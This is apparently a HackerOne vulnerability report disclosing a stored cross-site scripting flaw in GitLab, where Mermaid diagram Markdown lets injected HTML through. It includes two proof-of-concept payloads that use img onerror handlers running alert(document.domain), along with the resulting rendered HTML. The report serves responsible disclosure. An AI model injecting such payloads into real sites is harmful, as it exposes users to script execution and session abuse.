Stored XSS in any Markdown field due to Mermaid

Link:          https://hackerone.com/reports/341689
By:            @fransrosen

Details: Hi,

I read that Gitlab had enabled Mermaid and started to test it a bit.

I noticed that the following Markdown in Gitlab:

 ```mermaid
  graph LR
      B-->D(<img onerror=location=`javascript\u003aalert\u0028document.domain\u0029` src=x>);
 ```

Will end up in the following output:

<foreignObject width="0" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; white-space: nowrap;"><img onerror="location=`javascript\u003aalert\u0028document.domain\u0029`" src="x"></div></foreignObject>

Which will trigger the javascript on every page this is supported:

Impact

This is a pretty bad issue, since this creates a stored XSS on every place the markdown comments are possible, which is almost everywhere in Gitlab. I would suggest you to disable this, or make sure it's not possible to inject HTML using Mermaid.

Regards, Frans

The hacker selected the Cross-site Scripting (XSS) - Stored weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:

URL http://gitlab-instance-every-markdown-field.localhost

Verified Yes

Timeline: 2018-04-21 23:01:40 +0000: @fransrosen (comment) Here's a similar payload but using Mermaid-escaped ():

 ```mermaid
graph LR
    id1["<img src=x onerror=alert#lpar;document.domain#rpar;>"]
 ```

---